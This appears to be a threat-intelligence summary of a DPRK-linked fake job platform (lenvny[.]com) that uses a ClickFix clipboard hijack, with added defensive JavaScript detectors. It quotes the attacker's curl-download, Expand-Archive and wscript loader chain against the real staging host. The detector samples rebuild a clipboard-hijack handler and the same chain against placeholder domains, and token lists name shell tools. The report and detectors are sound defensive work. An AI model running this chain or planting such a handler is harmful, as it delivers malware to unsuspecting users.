A DPRK-linked Contagious Interview campaign is using a highly polished fake job platform (lenvny[.]com and related domains) to socially engineer AI, crypto and software talent into running a ClickFix workflow that delivers multi-stage malware through clipboard hijacking. The lure mimics legitimate hiring UX, impersonates firms such as Anthropic and Anchorage Digital, and silently swaps the victim's clipboard contents for a command that downloads a staged archive and executes a VBScript loader. #ContagiousInterview #lenvny
Keypoints
- The campaign is a DPRK-linked Contagious Interview variant built on a fully realized React/Next.js fake job platform (lenvny[.]com) that targets job seekers.
- Operators built realistic job listings impersonating firms such as Anthropic, Yuga Labs, Anchorage Digital, and others to attract AI, crypto, and software talent.
- The application flow collects personal details and resumes, asks for social/dev links, and culminates in a “Video Introduction” step that triggers the ClickFix malware delivery.
- The site hijacks the clipboard: a copy-event handler replaces whatever the victim copies with a command that downloads a staged ZIP and runs a VBS loader via wscript, so the victim executes the first stage by pasting it themselves.
- The multi-stage chain opens with an echo of a fake "graphics-driver" download as misdirection, uses curl with certificate checking disabled (-k) to fetch the archive from app[.]lenvny[.]com into %TEMP%, PowerShell Expand-Archive to unpack it, and wscript to execute update.vbs.
- This operation increases success probability by blending into normal remote hiring workflows, exploiting user habits (copy/paste) and targeting high-value capabilities (AI models, crypto systems).
- Recommendations to job seekers include verifying official domains, avoiding uploads to unverified sites, running unknown scripts in VMs/sandboxes, and scrutinizing off-domain interview requests.
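The copy-event hijack described above has a small, recognizable shape in page JavaScript. The Node script below is an added triage example by the editor, not code from the Validin write-up and not code recovered from lenvny[.]com: it scans a JavaScript source text for a copy listener that writes to the clipboard and suppresses the browser's default copy, then separates the hijack from the benign "append attribution on copy" handlers that use exactly the same APIs. The three sample sources, the shell-token list and the verdict labels are constructed assumptions.

```javascript
// Added example: static triage for the ClickFix clipboard-hijack pattern in
// page JavaScript. Not code from the write-up or from lenvny[.]com; the
// sample sources below are constructed by the editor.

// Tokens that do not belong in anything a job site should put on a clipboard.
// (Assumed list; extend for your environment.)
const SHELL_TOKENS = [
  /\bcurl\b/i, /\bwscript\b/i, /\bcscript\b/i, /\bpowershell\b/i, /\bmshta\b/i,
  /\bcmd(\.exe)?\b/i, /%TEMP%/i, /Expand-Archive/i, /\bcertutil\b/i, /\bosascript\b/i,
];

// Extract the contents of every single-, double- and backtick-quoted literal.
// Good enough for triage; it is not a full JS tokenizer (regex literals and
// comments containing quotes can confuse it).
function stringLiterals(src) {
  const re = /'((?:\\.|[^'\\])*)'|"((?:\\.|[^"\\])*)"|`((?:\\.|[^`\\])*)`/g;
  const out = [];
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[1] ?? m[2] ?? m[3]);
  return out;
}

// Three things together make the hijack shape: a copy listener, a write to
// event.clipboardData, and preventDefault() so the browser's own copy is
// suppressed. Legitimate "append attribution" scripts have the same shape, so
// the verdict also depends on what the script tries to put on the clipboard.
function scanForClipboardHijack(src) {
  const hasCopyListener =
    /addEventListener\(\s*['"]copy['"]/.test(src) || /\boncopy\s*=/.test(src);
  const setsClipboard = /clipboardData\s*\.\s*setData\s*\(/.test(src);
  const cancelsDefault = /\.preventDefault\s*\(\s*\)/.test(src);
  const suspiciousStrings = stringLiterals(src).filter((s) =>
    SHELL_TOKENS.some((re) => re.test(s)),
  );
  const hijackShape = hasCopyListener && setsClipboard && cancelsDefault;
  let verdict = 'clean';
  if (hijackShape && suspiciousStrings.length > 0) verdict = 'clickfix-hijack';
  else if (hijackShape) verdict = 'clipboard-rewrite-review'; // needs a human look
  return { hasCopyListener, setsClipboard, cancelsDefault, suspiciousStrings, verdict };
}

// Constructed sample A: the hijack. A real lure builds the payload per OS and
// arms the handler only on the "Video Introduction" step; the shape is the same.
// The domain is a placeholder, not the campaign's.
const SAMPLE_HIJACK = `
document.addEventListener('copy', function (e) {
  var payload = 'cmd /c curl -k -o "%TEMP%\\\\fixed.zip" https://app.example.invalid/cam.fix && wscript "%TEMP%\\\\fixed\\\\update.vbs"';
  e.clipboardData.setData('text/plain', payload);
  e.preventDefault();
});`;

// Constructed sample B: legitimate attribution appender. Same three API calls,
// so shape alone would be a false positive; the literal contents clear it.
const SAMPLE_ATTRIBUTION = `
document.addEventListener('copy', (e) => {
  const sel = document.getSelection().toString();
  e.clipboardData.setData('text/plain', sel + '\\n\\nRead more: https://example.test/post');
  e.preventDefault();
});`;

// Constructed sample C: copy analytics only, never touches clipboard contents.
const SAMPLE_ANALYTICS = `
document.addEventListener('copy', () => { navigator.sendBeacon('/m', 'copy'); });`;

const SAMPLES = { hijack: SAMPLE_HIJACK, attribution: SAMPLE_ATTRIBUTION, analytics: SAMPLE_ANALYTICS };

// Map each named sample to its verdict.
function triageAll(samples = SAMPLES) {
  return Object.fromEntries(
    Object.entries(samples).map(([name, src]) => [name, scanForClipboardHijack(src).verdict]),
  );
}

for (const [name, verdict] of Object.entries(triageAll())) console.log(`${name}: ${verdict}`);
```

Run it against a saved bundle with `node scan.js < bundle.js` after swapping the samples for `fs.readFileSync(0, 'utf8')`. The "review" verdict is deliberate: rewriting the clipboard on copy is common enough on content sites that the API pattern alone is not an alert; the discriminating evidence is a command interpreter, a %TEMP% path or a download tool inside a string literal the page has no business holding.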
MITRE Techniques
- [T1059] Command and Scripting Interpreter – The chain passes through three interpreters: the Windows command shell (T1059.003) for the echo/curl line, PowerShell (T1059.001) to expand the archive, and Visual Basic (T1059.005) via wscript for the loader: "echo curl -L … -o driver-update.exe … & curl -k -o "%TEMP%\fixed.zip" "https[:]//app[.]lenvny[.]com/cam-v-abc123.fix" … powershell -Command "Expand-Archive -Force -Path '%TEMP%\fixed.zip' -DestinationPath '%TEMP%\fixed'" && wscript "%TEMP%\fixed\update.vbs"."
- [T1204.004] User Execution: Malicious Copy and Paste – A copy event listener replaces whatever the victim selected with the attacker's command, so the victim pastes and runs it themselves: "…the handler swaps the victim's legitimate selection with a platform-specific malicious payload." Note that T1115 Clipboard Data describes reading the clipboard for collection, not overwriting it; the technique here is the overwrite.
- [T1656] Impersonation – The platform poses as Anthropic, Yuga Labs, Anchorage Digital and others with fabricated company pages, badges and testimonials: "professional-looking badges … fabricated testimonial quotes, and the logos of well-known tech companies."; "a fully formed, React Next.js based job platform … mirrors the UX of contemporary hiring systems."
- [T1105] Ingress Tool Transfer – The staged archive is pulled from attacker-controlled infrastructure with curl, TLS certificate verification disabled (-k): "curl -k -o "%TEMP%\fixed.zip" "https[:]//app[.]lenvny[.]com/cam-v-abc123.fix"."
- [T1036] Masquerading – The echoed "graphics-driver" download (driver-update.exe) is a decoy to make the pasted command look like a driver fix, and the ZIP archive is served with a .fix extension rather than .zip.
- [T1583.001] Acquire Infrastructure: Domains / [T1608.001] Stage Capabilities: Upload Malware – Attacker-registered domains (lenvny[.]com, advisorflux[.]com, assureeval[.]com, carrerlilla[.]com) host the lure, and app[.]lenvny[.]com stages the archive containing the VBScript loader: "wscript "%TEMP%\fixed\update.vbs"."
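The pasted command line leaves a distinctive trace in process-creation telemetry (Sysmon Event ID 1 or Security 4688, CommandLine field). The script below is an added detection example by the editor, not content from the Validin write-up: it scores command lines against each observable stage of the chain quoted above. The rules, weights and thresholds are assumptions, and the sample lines are constructed; the malicious one is modelled on the quoted chain with its elided parts and the real domain replaced by placeholders.

```javascript
// Added example: score Windows process-creation command lines for the ClickFix
// download-expand-execute chain. Not from the write-up; rules, weights,
// thresholds and sample lines are the editor's own.

// Each rule is one observable stage. Weights are assumptions: the wscript-from-
// %TEMP% stage is weighted highest because it is the actual execution step.
const RULES = [
  { id: 'decoy-echo',       w: 1, re: /\becho\b[^&|]*\b(driver|update)[\w-]*\.exe/i },
  { id: 'insecure-curl',    w: 2, re: /\bcurl(\.exe)?\b[^&|]*\s(-k|--insecure)\b/i },
  { id: 'curl-to-temp',     w: 2, re: /\bcurl(\.exe)?\b[^&|]*\s-o\s+"?%TEMP%\\/i },
  { id: 'fix-extension',    w: 1, re: /https?:\/\/[^\s"']+\.fix\b/i }, // campaign-specific
  { id: 'expand-from-temp', w: 2, re: /Expand-Archive[^&|]*%TEMP%\\/i },
  { id: 'wscript-temp-vbs', w: 3, re: /\b[wc]script(\.exe)?\b[^&|]*%TEMP%\\[^"']*\.vbs/i },
  { id: 'chained-stages',   w: 1, re: /(&&|\|\||&).+(&&|\|\||&)/ },
];

// Sum the weights of matching rules; thresholds are assumptions, tune to taste.
function scoreCommandLine(cmd) {
  const hits = RULES.filter((r) => r.re.test(cmd));
  const score = hits.reduce((s, r) => s + r.w, 0);
  const verdict = score >= 5 ? 'alert' : score >= 3 ? 'suspicious' : 'benign';
  return { score, hits: hits.map((r) => r.id), verdict };
}

// Constructed sample command lines (not real telemetry). Domains are placeholders.
const SAMPLE_LINES = [
  { label: 'clickfix-chain', cmd:
    `cmd.exe /c echo curl -L https://drivers.example.invalid/driver-update.exe -o driver-update.exe & ` +
    `curl -k -o "%TEMP%\\fixed.zip" "https://app.example.invalid/cam-v-abc123.fix" && ` +
    `powershell -Command "Expand-Archive -Force -Path '%TEMP%\\fixed.zip' -DestinationPath '%TEMP%\\fixed'" && ` +
    `wscript "%TEMP%\\fixed\\update.vbs"` },
  // A developer fetching a tool into %TEMP%: one stage, should stay benign.
  { label: 'dev-download', cmd: `curl.exe -L -o "%TEMP%\\tool.zip" https://downloads.example.test/tool.zip` },
  // An admin unpacking from %TEMP%: one stage, should stay benign.
  { label: 'admin-expand', cmd: `powershell -Command "Expand-Archive -Force -Path '%TEMP%\\tool.zip' -DestinationPath 'C:\\Tools'"` },
  // Only the loader stage seen (e.g. earlier stages ran in another process): worth a look.
  { label: 'loader-only', cmd: `wscript "%TEMP%\\fixed\\update.vbs"` },
];

// Score every line, keeping the label for reporting.
function triage(lines = SAMPLE_LINES) {
  return lines.map((l) => ({ label: l.label, ...scoreCommandLine(l.cmd) }));
}

for (const r of triage()) {
  console.log(`${r.verdict.padEnd(10)} ${String(r.score).padStart(2)}  ${r.label}  [${r.hits.join(', ')}]`);
}
```

Single stages such as a curl into %TEMP% or an Expand-Archive are everyday developer activity and score low on purpose; the alert comes from several stages chained in one command line. In production, pair this with the parent process: a command pasted into the Run dialog shows explorer.exe as parent of cmd.exe or powershell.exe, which is itself a useful ClickFix signal independent of the command text.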
Indicators of Compromise
- [Domain] Fake job platform and staging host – lenvny[.]com, app[.]lenvny[.]com (serves the archive as cam-v-abc123.fix)
- [Domain] Additional associated domains impersonating services – advisorflux[.]com, assureeval[.]com, carrerlilla[.]com
- [IP Address] Hosting/infrastructure examples – 69.62.86.78, 72.61.9.45
- [Filename/Command] Clipboard-injected command and staged artifacts – driver-update.exe (decoy downloader named in the echo), cam-v-abc123.fix (ZIP archive with a .fix extension), %TEMP%\fixed.zip, %TEMP%\fixed\update.vbs (VBScript loader run via wscript)
Read more: https://www.validin.com/blog/inside_dprk_fake_job_platform/